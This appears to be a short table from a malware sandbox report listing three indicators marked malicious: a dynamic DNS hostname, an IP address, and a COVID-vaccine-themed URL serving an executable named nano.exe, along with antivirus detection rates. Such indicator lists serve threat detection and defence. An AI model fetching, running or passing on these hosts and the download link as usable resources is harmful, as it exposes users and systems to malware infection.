Name | Malicious | Antivirus Detection | Reputation
nassiru1155.ddns.net | true | Avira URL Cloud: safe | unknown
http://covid19vaccinations.hopto.org/nano.exe | true | 13% (Virustotal); Avira URL Cloud: malware | unknown
79.134.225.30 | true | Avira URL Cloud: safe | unknown